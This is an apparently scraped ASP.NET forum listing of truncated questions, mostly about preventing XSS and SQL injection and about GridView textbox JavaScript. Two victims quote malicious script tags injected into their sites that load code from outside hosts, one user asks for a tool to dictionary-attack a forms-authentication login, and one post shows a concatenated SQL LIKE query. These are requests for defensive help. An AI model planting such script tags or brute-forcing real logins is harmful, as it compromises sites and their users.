I have a textBox and a property to get and set its value:
public SomeText
{
get { return HttpUtility.HtmlEncode(textBox.Text); }
set { textBox.Text = HttpUtility.HtmlEncode(value); }
}
I have used HtmlEncode to prevent Javascript injection attacks. After thinking about it though I'm thinking I only need the HtmlEncode on the getter. The setter is only used by the system and can not be accessed by an external user.
Can asp.net Dropdownlist and validating they safely protect against SQL injection attack ??
View 7 RepliesOur database affected with SQL Injection. so We need to create a sql server 2005 new login for SQL Injection prevention. User can perform, access tables with select, update and delete queryaccess views, functions and stored proc perform cursor. what are the permissions given for that login account?
View 1 RepliesIs the DetailsView control generally safe from SQL injection attacks if the EDIT mode is displayed?
View 3 RepliesI'm working on a C# web app and I've to handle some javascript code.
I can do it both using javascript injection from my .cs file, which I'm doing now or choose to include my code into an external js file.
I would like to know when you would prefer to choose one way over the other.
According to me, it can be more clear to put code in external .js file and it can ease debugging.
Code injection from code-behind would however keep together all the necessary code for my component.
I'm developer moving from C# to Java. Heard about new ASP net feature. <%: %>. It renders object with html encoding. Only these impolementing IHtmlString interface are not encoded (to prevent double encoding).See more in http://weblogs.asp.net/scottgu/archive/2010/04/06/new-lt-gt-syntax-for-html-encoding-output-in-asp-net-4-and-asp-net-mvc-2.aspx
View 2 RepliesIn the notes for Step 1 in the "How To: Prevent Cross-Site Scripting in ASP.NET" it is stated that you should "not rely on ASP.NET request validation. Treat it as an extra precautionary measure in addition to your own input validation."
View 2 RepliesI've got a free text form for people to submit feedback/support requests. ccasionally people will past in a support ticket or error log that contains something that triggers the .NET page validator as an XSS attempt. This takes the user to the error page as if the site choked on their input.Preferably, I'd rather have the page do some client-side validation when they press the save button before it's actually submitted.Is there a regex or some method I can hook into that would do the same basic check on the client side, or will I just have to write a regex that disallows certain characters all together like < and >?
View 1 RepliesMy website has been attacked by some malicious script < / title> < script src = http : // google-stats50.info/ur.php >. This script is appended to any column(s) of some table automatically. I have removed this script. But after a few hours, it re-appeared in some tables. But this time it is < / title> < script src = http : // google-stats49.info/ur.php >.My client is complaining about the script. Technology used is ASP.NET 1.1, SQL SERVER 2005.
View 6 RepliesI'm using a literal to display some javascript on a product page control. Basically what I'm doing is in my code behind I'm declaring a new stringbuilder, writing the script while inserting some dynamic variables to populate the script then setting the literal text to the stringbuilder. This leaves me open to xss attacks. What can I do to prevent this?
System.Text.StringBuilder sb = new System.Text.StringBuilder();
//loop through items in the collection
for (int i = 0; i < _prod.ActiveProductItemCollection.Count; i++)
{
sb.Append("<script type='text/javascript'>");
//add +1 to each item
sb.AppendFormat("mboxCreate("product_productpage_rec{0}",", i+1);
[code]...
a major problem from Cross-Site ScriptingAttack, Below is sample script which automatically gets inserted into my HTML and ASPX Pages.
"<script src=http://avidmarketing.ie/images/rc3/companybuttonwhite.php ></script>"
i am working on asp.net, for example in a form they are 10 text boxes i want to validate each textbox if it is empty it should display a alert message.
how to achieve this by using a single javasript method. can we pass texbox as an argument into javascript how to achieve this
I have a form where i have three textboxes and a gridview with two template textboxes.Now i need to get the total of all the textboxes including the template textboxes in another textbox named Total.I know how to get the total of textboxes using javascript.But now what i need is to get the total of all textboxes including the template textboxes in the Total textbox and also the value of total textbox should change if i change the previously entered value of any textbox
ie,if T1,T2,T3 are the textboxes and GridTxt1,Gridtxt2 are the Template textboxes then
Total=T1+T2+T3+GridTxt1+GridTxt2 and also [code].....
I am looking for something that takes an IIS/ASP.NET website that uses forms authentication and repeatedly tries to log in, either with all possible passwords or with passwords from a dictionary.
I can probably write something up, but I wondered if there was anything publicly available that would be better implemented.
i have 3 textboxes in single column of gridview each with different id prefixes
[code]....
nw i have around 3 radiobutton list for each textbox on page on which user can select differemt color for each textbox style
the problem is i want to change style ofall textboxes in gridview in each row through javascript on color selection in respective radiobuttonlist
i.e. if radiobutton list 1 is for txtAcctPrefix then on color selection all textboxes with this id should reflect changes
Can any one let me know "How to validate the length of the text present in the textboxes of a Gridview using javascript".
For Example: In a page I am displaying a Gridview with textboxes inside it and a button on the page. The user need to input some text in the textboxes of the gridview and click on "Submit" button. When the user clicks on Submit Button, we need to validate the length of the text present in the textboxes of the gridview. If the length of the text inside the textbox of the gridview is less than 10 , we need to throw an error message. In the same way we need to do validation for each and every textbox inside the gridview.
I have a GridView, that contains 3 Textboxes. Say Textbox1, Textbox2 & Textbox3
Now how do I subtract the value of Textbox1 & Textbox2 & show the result in Textbox3?How to do this in JavaScript?
Multiplication of two columns in gridview and display the result in third column using Javascript
View 1 RepliesI have a repeater which is binded using a Collection of Entity Data Framework.
Once the repeater is binded using the datasource, the user can control the no of rows present in the repeater using a Dropdown list on the page. For ex: if datasource has 2 rows, user want to add 3 more rows, user selects 5 from dropdown, which adds 3 additional rows to the Repeater. I am able to do this.
The repeater has textbox controls in each row. Now once the user enter the values in this textbox of the newly generated rows, the user can save the values entered with the no of rows specified.
I have a button which is outside the repeater and on click of this i need to validate all the textbox values and save them into dB accordingly.
Here is my code
Repeater.aspx
[Code]....
[Code]....
Repeater.aspx.cs
[Code]....
Right now the problem is im not able to fetch the values of the textboxes present in the newly generated rows.
[URL]
I've done this using bound controls like Repeaters etc but now I need to display information about a single file for example. SO i will pass the fileid in the querystring, then I need to populate some textboxes, autocomplete textboxes etc. and then save changes. what's the most efficient way of doing this?
View 13 RepliesI want to display the world's top 100 IT giants list up-to-date on my webapge. from where can i get the informaiton? Is it possible to get the RSS feed for this?
View 4 RepliesI want to know how my data could be compromised using a statemnt like SELECT [ID], [item], [price] FROM [Items] where item LIKE '%' + mitem + '%'" what line of could be considered an attack to the data.
View 16 RepliesI've a blog-driven ASP.NET website. Under the post, there is a Comment block to let readers post comments.I've used some TextBoxes and TextArea for that.To Prevent XSS:I've filtered the input by using: Server.HtmlEncode() Method (I don't care about text formatting).To Prevent SQL-Injection:I'm using Linq To SQL (that should be like parametrized queries I think!).
ArticlesDataClasses dc = new ArticlesDataClasses();
ArticleComment newComm = new ArticleComment()
{
ArticleID = int.Parse(Request.QueryString["ArticleID"]),
CommentAuthor = Server.HtmlEncode(txtName.Text),
CommentText = Server.HtmlEncode(txtComment.InnerHtml).Replace("
", "<br />"),
CommentAuthorEmail = Server.HtmlEncode(txtMail.Text),
CommentTime = DateTime.Now,
Enabled = false
};
I have a page using an injected BLL service: a simple service returning a set of objects with a function like this:
public IMyService { List<Foo> All(); }
There is a default implementation for normal users.Now, i need that users in administrative role can view more objects, with another implementation of the service.Where can i configure my page to use the second implementation?
My first solution is to put the dependency to the IUnityContainer in the page, and use it to resolve the dependency:
[Dependency]
public IUnityContainer Container { get; set;}
Page_Init(..) [code].....
it's a ServiceLocator and it's neither scalable neither testable.
During the design of a new generic authentication framework for some of our products, I have come across an architectural issue I cannot seem to find a good solution for.I have tried to simplify the problem in order to easily explain it.
The library has two classes:
Manager Is responsible for storing currently authenticated users.Module It is the responsibility for the module to validate each request according to security policies. The Module must ask the manager to determine whether a user is currently authenticated.
Now the manager is supplied an implementation of an interface which allows the manager to load users from a repository. The specific implementation is not contained in this library. Because of this, I cannot directly instantiate an instance of the repository within the library.
I have no way of modifying properties or supplying arguments for the module constructor. So my question is this, how can I give the module a reference to an instance of the Manager?
namespace Demo
{
public interface IRepository
{[code].....